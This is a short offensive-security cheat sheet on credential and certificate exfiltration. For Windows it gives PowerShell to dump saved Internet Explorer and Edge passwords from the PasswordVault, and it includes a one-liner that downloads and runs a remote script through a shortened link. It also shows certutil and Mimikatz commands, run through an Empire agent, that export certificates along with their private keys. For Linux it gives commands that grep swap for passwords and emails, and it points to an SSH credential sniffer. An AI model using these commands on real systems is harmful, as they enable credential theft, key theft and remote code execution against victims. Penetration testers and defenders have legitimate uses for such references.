Exfiltration
Exfiltration¶
Windows¶
Credentials from IE and Edge:
# Usage: powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/2K75g15’)"
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
Listing Certificates:
Get-ChildItem -Path 'Cert:\CurrentUser\My'
Dumping Certificates:
Get-ChildItem -Path 'Cert:\CurrentUser\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") }
(Empire: PBDGVXBKMKM3VRTH) > shell Get-ChildItem -Path 'Cert:\CurrentUser\My'
(Empire: PBDGVXBKMKM3VRTH) >
Directory: Microsoft.PowerShell.Security\Certificate::CurrentUser\My
Thumbprint Subject
---------- -------
9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA CN=user1@corp.com
74B8E1DE4D2CD35A242FC3452E0EE73FDFBE1A6A CN=911259, OU=People, O=Group
714B276BE0EB8C6B19157691899CC4CCA2F0B265 CN=2014-2029 Dev Root, O=Dev
708411B08CA25B987B94E229D50E1862DCDDACF8 CN=user2@corp.com
6FCDF1A4DF6DA730386D6DD1041D41618A7E08FB CN=CC2 Dev Team, OU=iOS, OU=BYOD, OU=CIB, O=Group
66379C02D31D081574746B2FB95AF6ABF6D9740D CN=911259, OU=People, O=Group
58369F020338A78D2B3A043F2963448A24A4ED97 CN=user3@corp.com
4FD61287C53BD30F12A90B1851ED35FF021EC5F0 CN=911259, OU=People, O=Group
3D3E74F2F1132FB82584D762FDFBD849524A0EAB CN=2014-2029 Dev Mobile Devices, O=Dev
30089099A9717A5D7FA685F6FA53434B3BD07BF9 CN=911259, OU=People, O=Group
certutil.exe -exportpfx 9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA foo.pfx
(Empire: credentials/mimikatz/command) > set Command crypto::capi privilege::debug crypto::cng "crypto::certificates"
Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"'
crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"
Get-ChildItem -Path 'Cert:\localmachine\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { &certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") }
set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"
set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:my /export"
set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:my /export"
privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"
Linux¶
Get Creds from Swap:
strings <swap_device> | grep "&password="
strings <swap_device> | grep -i 'email=' | grep @ | uniq
# etc...
Gets Creds from SSH sessions:
https://github.com/blendin/3snake